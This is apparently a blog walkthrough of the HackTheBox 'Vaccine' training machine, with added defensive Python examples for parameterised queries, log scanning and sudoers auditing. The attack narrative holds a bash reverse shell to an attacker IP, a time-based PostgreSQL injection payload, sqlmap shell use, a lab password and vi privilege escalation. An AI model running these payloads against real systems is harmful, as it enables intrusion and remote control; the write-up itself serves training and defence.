HackTheBox Starting point Vaccine .46

Posted by Mr.Be1ieVe on Monday, April 19, 2021

Information gathering

The port scan shows FTP, SSH and a web server.

Recalling the FTP account obtained earlier in the Starting Point series, I logged in with it and downloaded backup.zip.

Using a SecLists wordlist, I brute-forced the archive password and was able to log into the back end.

SQL injection

The backup gives the MD5 of the login password; cracking it and logging in redirects to dashboard.php.

I guessed the page's SQL was something like select * from table where name = Input. Entering sport'+and+1=1 in the search box returned the error ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%sport' and 1=1%' ^ , which shows the real query: the input is concatenated straight into an ilike '%...%' pattern, so a single quote in the input ends the string literal and the rest is parsed as SQL.
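The following is an added example, not code from the write-up or from the box. It reproduces the query shape revealed by the error message above (input concatenated into a LIKE '%...%' pattern) beside the parameterised version that closes the hole. sqlite3 is used as a stand-in for PostgreSQL so the script runs offline; the cars rows are constructed.

```python
import sqlite3

# Constructed sample rows standing in for the dashboard's "cars" table
# (assumption: the real target is PostgreSQL; sqlite3 keeps this offline).
ROWS = [("Elixir Sport", "Sport"), ("Family Van", "Family"), ("City Runabout", "City")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars (name TEXT, type TEXT)")
    conn.executemany("INSERT INTO cars VALUES (?, ?)", ROWS)
    return conn


def search_vulnerable(conn, user_input):
    # String concatenation, as reconstructed from the PostgreSQL error in the
    # write-up: any quote in user_input terminates the literal and the
    # remainder is parsed as SQL. LIKE wildcards in the input also leak through.
    sql = "SELECT name FROM cars WHERE name LIKE '%" + user_input + "%'"
    return [r[0] for r in conn.execute(sql)]


def search_safe(conn, user_input):
    # Bound parameter: the input is always data. LIKE metacharacters are
    # escaped too, so the caller cannot widen the match with % or _.
    escaped = (user_input.replace("\\", "\\\\")
               .replace("%", "\\%")
               .replace("_", "\\_"))
    sql = "SELECT name FROM cars WHERE name LIKE ? ESCAPE '\\'"
    return [r[0] for r in conn.execute(sql, ("%" + escaped + "%",))]


def probe(conn, user_input):
    """Run the vulnerable search and report ('ok', rows) or ('error', msg).

    The 'error' branch is the sqlite3 counterpart of the "unterminated quoted
    string" message that gave the real query away on the box."""
    try:
        return ("ok", search_vulnerable(conn, user_input))
    except sqlite3.OperationalError as e:
        return ("error", str(e))


if __name__ == "__main__":
    db = make_db()
    print(probe(db, "sport"))                 # normal search
    print(probe(db, "sport' and 1=1"))        # the probe from the write-up -> syntax error
    print(search_vulnerable(db, "%"))         # wildcard dumps every row
    print(search_safe(db, "sport' and 1=1"))  # same input, treated as data
    print(search_safe(db, "%"))               # literal '%', matches nothing
```

The point to take from the safe version is that the quote and the wildcard are both neutralised by binding, not by filtering: the error message disappears, and so does the boolean/time-based channel that sqlmap and xray use to confirm the bug.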

xray scan result

[Vuln: sqldet]
Target           "http://10.10.10.46/dashboard.php?search=1"
VulnType         "blind-based/default"
Payload          "1'/**/and(select'1'from/**/pg_sleep(2))>'0"
Position         "query"
ParamKey         "search"
ParamValue       "1'/**/and(select'1'from/**/pg_sleep(2))>'0"
std_dev          "5"
sleep_time       "2000"
p_time           "187"
n_time           "2191"
stat             "{\"normal\":{\"samples\":[193,187,200,194,184,194],\"avg\":192,\"std_dev\":5.196152422706632,\"sleep_time\":2},\"sleep_0_time\":187,\"quick_check\":{\"samples\":[2191],\"sleep\":2},\"verify\":{\"samples\":[3189,3193,3189],\"sleep\":3}}"
title            "Generic PostgreSQL time based case ['string']"
type             "time_based"
avg_time         "192"
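Seen from the server side, both the manual probe and the xray payload above leave a clear trail in the Apache access log. The following added example (not part of the write-up) scans constructed combined-format log lines, URL-decodes the query string and flags parameter values carrying injection markers: a quote followed by and/or (optionally through /**/ comments), inline comments, pg_sleep(), and comment or statement terminators. The log lines, the indicator list and the 500 status on the probe are all constructed for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access log lines (not from the box).
# Lines 2 and 3 carry the manual probe and the xray payload from above, URL-encoded.
LOG_LINES = [
    '10.10.14.180 - - [19/Apr/2021:10:00:01 +0000] "GET /dashboard.php?search=sport HTTP/1.1" 200 1532',
    '10.10.14.180 - - [19/Apr/2021:10:00:02 +0000] "GET /dashboard.php?search=sport%27+and+1%3D1 HTTP/1.1" 500 412',
    '10.10.14.180 - - [19/Apr/2021:10:00:03 +0000] "GET /dashboard.php?search=1%27%2F%2A%2A%2Fand%28select%271%27from%2F%2A%2A%2Fpg_sleep%282%29%29%3E%270 HTTP/1.1" 200 1532',
    '10.10.14.181 - - [19/Apr/2021:10:00:04 +0000] "GET /dashboard.php?search=family%20van HTTP/1.1" 200 1601',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicator patterns (assumption: an illustrative subset, tuned to the payloads on this page).
INDICATORS = [
    ("quote-and-boolean", re.compile(r"'\s*(?:/\*.*?\*/\s*)*(and|or)\b", re.I | re.S)),
    ("inline-comment", re.compile(r"/\*.*?\*/", re.S)),
    ("pg_sleep", re.compile(r"\bpg_sleep\s*\(", re.I)),
    ("terminator", re.compile(r"--|;")),
]


def scan_line(line):
    """Return a finding dict for a log line whose query string looks like SQLi, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs URL-decodes each value once, which undoes the %27 / %2F encoding
    # used in the requests above. Double-encoded payloads would need a second pass.
    params = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
    hits = []
    for key, values in params.items():
        for value in values:
            names = [name for name, rx in INDICATORS if rx.search(value)]
            if names:
                hits.append((key, value, names))
    if not hits:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "hits": hits}


def scan_log(lines):
    return [f for f in (scan_line(l) for l in lines) if f]


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        for key, value, names in finding["hits"]:
            print(f"{finding['ts']} {finding['ip']} HTTP {finding['status']} "
                  f"param={key} indicators={','.join(names)} value={value!r}")
```

The 500 on the probe line is worth its own alert: an application that turns a database syntax error into a server error is telling the client exactly what the write-up used, that the input reaches the query unescaped. The time-based payload, by contrast, returns 200 and is only visible through the decoded parameter or through response-time outliers, which is why both the content and the latency of the request need to be logged.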

I took a detour here because the cookie passed to sqlmap was wrong. With the correct cookie, sqlmap detects the injection directly and can obtain a shell.

Reading /var/www/html/dashboard.php reveals the password P@s5w0rd!

After getting the os-shell, spawn a reverse shell: bash -c 'bash -i >& /dev/tcp/10.10.14.180/4444 0>&1'

sudo -l lists the commands the security policy allows this user to run.

Upgrade the plain shell to a TTY:

SHELL=/bin/bash script -q /dev/null
python3 -c "import pty;pty.spawn('/bin/bash')"  

Key points

Using FTP

Password brute-forcing

PostgreSQL injection and usage

sqlmap

Obtaining credentials from the Apache configuration files

Privilege escalation via vi
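The last two key points (sudo -l and escalation through vi) come down to a sudoers rule that hands a low-privileged user an editor capable of spawning a shell. As an added example (not from the box; the sudoers fragment and the binary list are constructed), the script below parses sudoers-style rules and flags the ones that grant such a binary, or ALL, to a non-root user, which is the check an administrator would run before an attacker runs sudo -l.

```python
import os
import re

# Constructed sudoers fragment (not taken from the machine). The postgres/vi
# rule mirrors the "privilege escalation via vi" takeaway above.
SUDOERS_SAMPLE = """
# User privilege specification
root    ALL=(ALL:ALL) ALL
postgres ALL=(ALL) NOPASSWD: /bin/vi /etc/postgresql/11/main/pg_hba.conf
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
backup  ALL=(ALL) /usr/bin/less /var/log/syslog
"""

# Binaries that can drop to a shell or run arbitrary commands from inside.
# Assumption: a short illustrative subset of what GTFOBins documents.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "less", "more", "man",
                         "python", "python3", "perl", "awk", "find"}

# user host=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Parse user-specification lines into one dict per granted command.

    Defaults lines, %group rules and aliases are skipped to keep the demo short."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "%")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = m["cmds"]
        nopasswd = "NOPASSWD:" in cmds
        cmds = re.sub(r"\b(NOPASSWD|PASSWD|SETENV|NOSETENV):", "", cmds)
        for cmd in cmds.split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            binary = os.path.basename(cmd.split()[0])
            rules.append({"user": m["user"], "runas": m["runas"] or "root",
                          "nopasswd": nopasswd, "command": cmd, "binary": binary})
    return rules


def risky_rules(text):
    """Rules granting a non-root user either everything or a binary with a shell escape."""
    return [r for r in parse_sudoers(text)
            if r["user"] != "root"
            and (r["command"] == "ALL" or r["binary"] in SHELL_ESCAPE_BINARIES)]


if __name__ == "__main__":
    for r in risky_rules(SUDOERS_SAMPLE):
        tag = "NOPASSWD" if r["nopasswd"] else "password"
        print(f"{r['user']} -> ({r['runas']}) {r['command']}  [{tag}] via {r['binary']}")
```

Restricting the argument, as the postgres rule does, does not help when the binary itself can run commands: the fix is to grant a purpose-built wrapper or sudoedit instead of the editor, and to treat every NOPASSWD entry as equivalent to the run-as user's shell until proven otherwise.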
